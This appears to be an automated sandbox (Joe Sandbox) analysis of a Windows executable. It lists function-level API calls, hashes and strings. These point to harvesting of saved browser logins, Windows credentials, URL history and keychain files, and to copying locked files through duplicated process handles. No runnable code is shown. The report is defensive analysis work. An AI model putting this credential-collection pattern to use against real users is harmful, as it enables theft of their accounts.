39360->38952 39361->38952 39362->38938 39363->38968 39364->38970 39365->38972 39367 414c2e 16 API calls 39366->39367 39368 40c2ae 39367->39368 39438 40c1d3 39368->39438 39373 40c3be 39390 40a8ab 39373->39390 39374 40afcf 2 API calls 39375 40c2fd FindFirstUrlCacheEntryW 39374->39375 39376 40c3b6 39375->39376 39377 40c31e wcschr 39375->39377 39378 40b04b ??3@YAXPAX 39376->39378 39379 40c331 39377->39379 39380 40c35e FindNextUrlCacheEntryW 39377->39380 39378->39373 39381 40a8ab 9 API calls 39379->39381 39380->39377 39382 40c373 GetLastError 39380->39382 39385 40c33e wcschr 39381->39385 39383 40c3ad FindCloseUrlCache 39382->39383 39384 40c37e 39382->39384 39383->39376 39386 40afcf 2 API calls 39384->39386 39385->39380 39387 40c34f 39385->39387 39388 40c391 FindNextUrlCacheEntryW 39386->39388 39389 40a8ab 9 API calls 39387->39389 39388->39377 39388->39383 39389->39380 39532 40a97a 39390->39532 39393 40a8cc 39393->38979 39394 40a8d0 7 API calls 39394->39393 39537 40b1ab free free 39395->39537 39397 40c3dd 39398 40b2cc 27 API calls 39397->39398 39399 40c3e7 39398->39399 39538 414592 RegOpenKeyExW 39399->39538 39401 40c3f4 39402 40c50e 39401->39402 39403 40c3ff 39401->39403 39417 405337 39402->39417 39404 40a9ce 4 API calls 39403->39404 39405 40c418 memset 39404->39405 39539 40aa1d 39405->39539 39408 40c471 39410 40c47a _wcsupr 39408->39410 39409 40c505 RegCloseKey 39409->39402 39411 40a8d0 7 API calls 39410->39411 39412 40c498 39411->39412 39413 40a8d0 7 API calls 39412->39413 39414 40c4ac memset 39413->39414 39415 40aa1d 39414->39415 39416 40c4e4 RegEnumValueW 39415->39416 39416->39409 39416->39410 39541 405220 39417->39541 39421 4099c6 2 API calls 39420->39421 39422 40a714 _wcslwr 39421->39422 39423 40c634 39422->39423 39598 405361 39423->39598 39426 40c65c wcslen 39601 4053b6 39 API calls 39426->39601 39427 40c71d wcslen 39427->38993 39429 40c677 39430 40c713 39429->39430 39602 40538b 39 API calls 39429->39602 39604 4053df 39 API calls 39430->39604 39433 40c6a5 
[Execution graph residue: the node and edge listing of the sandbox's call graph (numeric node ids, function addresses and resolved import names) spilled into the text where the interactive graph was rendered. The recoverable information is the set of imported APIs reached along the graph's paths, which include: FindResourceW / SizeofResource / LoadResource / LockResource and EnumResourceNamesW (resource access); OpenProcess / GetCurrentProcess / DuplicateHandle, CreateFileW / CreateFileMappingW / MapViewOfFile / WriteFile / UnmapViewOfFile, GetTempPathW / GetTempFileNameW / GetWindowsDirectoryW and DeleteFileW (process-handle and file-mapping use, temp-file creation); GetPrivateProfileStringW / GetPrivateProfileIntW / WritePrivateProfileStringW and RegEnumValueW (INI and registry access); K32GetModuleFileNameExW, GetProcessTimes, GetVersionExW, GetDiskFreeSpaceW / GetDiskFreeSpaceA, GetFileAttributesW, GetFileTime / CompareFileTime, SetFilePointer / SetFilePointerEx / ReadFile, GetLastError and Sleep (environment and file queries); FreeLibrary, GetModuleHandleW and GetProcAddress (dynamic import resolution); plus the C runtime helpers memset, memcpy, memcmp, malloc, free, wcscpy, wcscat, wcschr, wcslen, wcscmp, _wcsicmp, _memicmp, _snwprintf, _itow, MultiByteToWideChar / WideCharToMultiByte and AreFileApisANSI.]
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph

(Rendered graph for the function at 44553b; its node/edge list and the executed/not-executed colouring cannot be recovered as text. What the block labels show: the entry block 44553b-445558 calls 44db70 and then 40c768, 40bdb0 and 4135f7, the subcalls that perform _wcslwr, CredEnumerateW and GetProcAddress in the APIs list that follows; the block at 4455a8 calls memset and wcsrchr; a run of similar blocks (4458bb, 44595e, 445a00, 445b38, 445c8b, 445d88) clears two or three buffers with memset and then calls 414c2e and 409d1f (wcslen/wcscpy/wcscat, i.e. path assembly), mostly with 40b2cc in between and 409b98 (GetFileAttributesW) afterwards; 445d3d compares a name with _wcsicmp; and 445d71, 445e6b and 445f3a call 445093, which sizes a file and closes its handle.)
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                            • API String ID: 2263259095-3798722523
                                                                                                                                                                                                                                            • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                                                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                            • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                            • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040B71C
  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
• wcsrchr.MSVCRT ref: 0040B738
• memset.MSVCRT ref: 0040B756
• memset.MSVCRT ref: 0040B7F5
• CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
• CopyFileW.KERNELBASE(00445FAE,?,00000000,?,?), ref: 0040B82D
• CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
• memset.MSVCRT ref: 0040B851
• memset.MSVCRT ref: 0040B8CA
• memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
• memset.MSVCRT ref: 0040BB53
• memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
• LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
• String ID: chp$v10
• API String ID: 4165125987-2783969131
• Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
• Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
• Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
• Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

Control-flow Graph (rendered graph for function 004091B8 omitted; nodes marked Executed / Not Executed in the original)

APIs
• memset.MSVCRT ref: 004091E2
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
• memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
• memcpy.MSVCRT(?,00000023,?), ref: 0040930C
• memcpy.MSVCRT(?,?,00000010), ref: 00409325
• memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
• memcpy.MSVCRT(?,00000015,?), ref: 00409357
• memcpy.MSVCRT(?,?,00000010), ref: 00409370
• memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
• memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
• memcpy.MSVCRT(?,00000023,?), ref: 00409462
• memcpy.MSVCRT(?,?,00000010), ref: 0040947E
• memcpy.MSVCRT(?,?,00000020), ref: 0040949A
• memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
• memcpy.MSVCRT(?,00000015,?), ref: 004094D0
• memcpy.MSVCRT(?,?,00000020), ref: 004094E8
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memcpy$memcmp$ByteCharMultiWidememset
• String ID:
• API String ID: 3715365532-3916222277
• Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
• Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
• Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
• Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

Control-flow Graph

APIs
  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
  • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_400000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                            • String ID: bhv
                                                                                                                                                                                                                                            • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                            Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
• Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
• Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
• wcschr.MSVCRT ref: 0040C324
• wcschr.MSVCRT ref: 0040C344
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
• GetLastError.KERNEL32 ref: 0040C373
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
• FindCloseUrlCache.WININET(?), ref: 0040C3B0
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
• String ID: visited:
• API String ID: 1157525455-1702587658
• Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
• Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
• Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

Control-flow Graph

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
• memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• free.MSVCRT ref: 0040E28B
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
  • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
• _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
• Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
• Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
• Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Control-flow Graph
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID: |A
• API String ID: 77810686-1717621600
• Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
• Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
• Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Control-flow Graph

APIs
• memset.MSVCRT ref: 0041249C
• ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
• ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
• GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
• LoadIconW.USER32(00000000,00000065), ref: 0041258B
• wcscpy.MSVCRT ref: 004125A0
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: ??2@$HandleIconLoadModulememsetwcscpy
• String ID: r!A
• API String ID: 2791114272-628097481
• Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
• Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
• Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Control-flow Graph

APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
• wcslen.MSVCRT ref: 0040C82C
Strings
Memory Dump Source
• Source File: 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_400000_graias.jbxd
Similarity
• API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
